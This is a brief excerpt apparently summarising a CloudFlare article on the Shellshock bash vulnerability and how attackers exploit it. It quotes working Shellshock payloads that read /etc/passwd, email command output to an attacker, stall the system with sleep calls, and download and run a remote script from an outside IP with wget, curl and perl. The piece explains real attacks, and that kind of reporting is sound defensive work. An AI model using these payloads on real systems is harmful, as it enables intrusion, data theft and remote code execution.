Shellshock is a simple exploit that is seriously bad; CloudFlare talks about how they patched their system so quickly
Inside Shellshock: How hackers are using it to exploit systems.
On Wednesday of last week, details of the Shellshock bash bug emerged. This bug started a scramble to patch computers, servers, routers, firewalls, and other computing appliances using vulnerable versions of bash.
Get system passwords:
() {:;}; /bin/cat /etc/passwd
Email the attacker:
() { :;}; /bin/bash -c "whoami | mail -s 'example.com l' [email protected]
DDoS:
() { :;}; /bin/sleep 20|/sbin/sleep 20|/usr/bin/sleep 20
Run Arbitrary script:
() { :;}; /bin/bash -c "cd /tmp;wget http://213.x.x.x/ji;curl -O /tmp/ji http://213.x.x.x/ji ; perl /tmp/ji;rm -rf /tmp/ji"
Shellshock isn’t just an attack on web sites: it’s an attack on anything that’s running bash and accessible across the Internet. That could include hardware devices, set-top boxes, laptop computers, even, perhaps, telephones.
Read the full article at cloudflare.com